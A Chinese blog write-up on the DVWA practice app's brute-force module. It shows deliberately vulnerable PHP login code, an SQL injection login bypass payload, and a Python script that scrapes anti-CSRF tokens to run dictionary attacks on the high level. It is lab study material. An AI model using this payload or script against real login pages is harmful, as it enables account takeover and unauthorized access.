DVWA笔记之brute
2017-08-15 本文已影响0人
inspireboom
Brute Force
low服务端代码:
<?php
if(isset($_GET['Login'])){
//Getusername
$user=$_GET['username'];
//Getpassword
$pass=$_GET['password'];
$pass=md5($pass);
//Checkthedatabase
$query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
if($result&&mysql_num_rows($result)==1){
//Getusersdetails
$avatar=mysql_result($result,0,"avatar");
//Loginsuccessful
echo"<p>Welcometothepasswordprotectedarea{$user}</p>";
echo"<imgsrc="{$avatar}"/>";
}
else{
//Loginfailed
echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
}
mysql_close();
}
?>
暴力破解思路:
账号admin,
1、简单字典多次暴力破解
2、sql注入(例如:admin' or '1'='1)
medium服务端代码:
<?php
if(isset($_GET['Login'])){
//Sanitiseusernameinput
$user=$_GET['username'];
$user=mysql_real_escape_string($user);
//Sanitisepasswordinput
$pass=$_GET['password'];
$pass=mysql_real_escape_string($pass);
$pass=md5($pass);
//Checkthedatabase
$query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
if($result&&mysql_num_rows($result)==1){
//Getusersdetails
$avatar=mysql_result($result,0,"avatar");
//Loginsuccessful
echo"<p>Welcometothepasswordprotectedarea{$user}</p>";
echo"<imgsrc="{$avatar}"/>";
}
else{
//Loginfailed
sleep(2);
echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
}
mysql_close();
}
?>
破解思路:
medium的代码主要增加了mysql_real_escape_string函数,这个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击。并且密码用了md5,也无法注入,sleep(2)也无法有效阻止暴力破解。
账号同为admin
简单字典多次暴力破解
high服务端代码:
<?php
if(isset($_GET['Login'])){
//CheckAnti-CSRFtoken
checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');
//Sanitiseusernameinput
$user=$_GET['username'];
$user=stripslashes($user);
$user=mysql_real_escape_string($user);
//Sanitisepasswordinput
$pass=$_GET['password'];
$pass=stripslashes($pass);
$pass=mysql_real_escape_string($pass);
$pass=md5($pass);
//Checkdatabase
$query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
$result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
if($result&&mysql_num_rows($result)==1){
//Getusersdetails
$avatar=mysql_result($result,0,"avatar");
//Loginsuccessful
echo"<p>Welcometothepasswordprotectedarea{$user}</p>";
echo"<imgsrc="{$avatar}"/>";
}
else{
//Loginfailed
sleep(rand(0,3));
echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
}
mysql_close();
}
//GenerateAnti-CSRFtoken
generateSessionToken();
?>
high加入了token,可以抵御csrf攻击,使用了stripslashes(去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个)
利用思路:
由于加入token不能无脑爆破了。。,写个脚本吧。
所以想起python有个BeautifulSoup的插件可以获得token然后爆破。所以网上参考下,写个python脚本
from bs4 import BeautifulSoup
import urllib2
header = {
'Host':'139.199.12.253',
'Cache-Control':'max-age=0',
'IF-None-Match':"307-52156c6a290c0",
'IF-Modified-Since':'Tue, 15 Agu 2017 07:25:23 GMT',
'User-Agent':'Mozilla/5.0(Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
'Accept': '*/*',
'Referer': 'http://139.199.12.253/dvwa/vulnerabilities/brute/index.php',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'security=high; PHPSESSID=ghdpaoprianls3rd7cupdfkpk5'
}
requrl = "http://139.199.12.254/dvwa/vulnerabilities/brute/"
def get_token(requrl,header):
req = urllib2.Request(url=requrl,headers=header)
response = urllib2.urlopen(req)
print response.getcode(),
the_page = response.read()
print len(the_page)
soup = BeautifulSoup(the_page,"html.parser")
user_token = soup.form.input.input.input.input["value"]
print user_token
return user_token
user_token = get_token(requrl,header)
i=0
for line in open("brute.txt"):
requrl = "http://139.199.12.254/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
i=i+1;
print i,'admin',line.strip(),
user_token = get_token(requrl,header)
if (i==10):
break
pass
然后可利用字典了。。
impossible服务端代码:
<?php
if(isset($_POST['Login'])){
//CheckAnti-CSRFtoken
checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');
//Sanitiseusernameinput
$user=$_POST['username'];
$user=stripslashes($user);
$user=mysql_real_escape_string($user);
//Sanitisepasswordinput
$pass=$_POST['password'];
$pass=stripslashes($pass);
$pass=mysql_real_escape_string($pass);
$pass=md5($pass);
//Defaultvalues
$total_failed_login=3;
$lockout_time=15;
$account_locked=false;
//Checkthedatabase(Checkuserinformation)
$data=$db->prepare('SELECTfailed_login,last_loginFROMusersWHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
$row=$data->fetch();
//Checktoseeiftheuserhasbeenlockedout.
if(($data->rowCount()==1)&&($row['failed_login']>=$total_failed_login)){
//Userlockedout.Note,usingthismethodwouldallowforuserenumeration!
//echo"<pre><br/>Thisaccounthasbeenlockedduetotoomanyincorrectlogins.</pre>";
//Calculatewhentheuserwouldbeallowedtologinagain
$last_login=$row['last_login'];
$last_login=strtotime($last_login);
$timeout=strtotime("{$last_login}+{$lockout_time}minutes");
$timenow=strtotime("now");
//Checktoseeifenoughtimehaspassed,ifithasn'tlockedtheaccount
if($timenow>$timeout)
$account_locked=true;
}
//Checkthedatabase(ifusernamematchesthepassword)
$data=$db->prepare('SELECT*FROMusersWHEREuser=(:user)ANDpassword=(:password)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->bindParam(':password',$pass,PDO::PARAM_STR);
$data->execute();
$row=$data->fetch();
//Ifitsavalidlogin...
if(($data->rowCount()==1)&&($account_locked==false)){
//Getusersdetails
$avatar=$row['avatar'];
$failed_login=$row['failed_login'];
$last_login=$row['last_login'];
//Loginsuccessful
echo"<p>Welcometothepasswordprotectedarea<em>{$user}</em></p>";
echo"<imgsrc="{$avatar}"/>";
//Hadtheaccountbeenlockedoutsincelastlogin?
if($failed_login>=$total_failed_login){
echo"<p><em>Warning</em>:Someonemightofbeenbruteforcingyouraccount.</p>";
echo"<p>Numberofloginattempts:<em>{$failed_login}</em>.<br/>Lastloginattemptwasat:<em>${last_login}</em>.</p>";
}
//Resetbadlogincount
$data=$db->prepare('UPDATEusersSETfailed_login="0"WHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
}
else{
//Loginfailed
sleep(rand(2,4));
//Givetheusersomefeedback
echo"<pre><br/>Usernameand/orpasswordincorrect.<br/><br/>Alternative,theaccounthasbeenlockedbecauseoftoomanyfailedlogins.<br/>Ifthisisthecase,<em>pleasetryagainin{$lockout_time}minutes</em>.</pre>";
//Updatebadlogincount
$data=$db->prepare('UPDATEusersSETfailed_login=(failed_login+1)WHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
}
//Setthelastlogintime
$data=$db->prepare('UPDATEusersSETlast_login=now()WHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
}
//GenerateAnti-CSRFtoken
generateSessionToken();
?>
impossible 明显加入防爆破,登录次数验证,也用了PDO,有效防止注入,目前臣妾做不到。
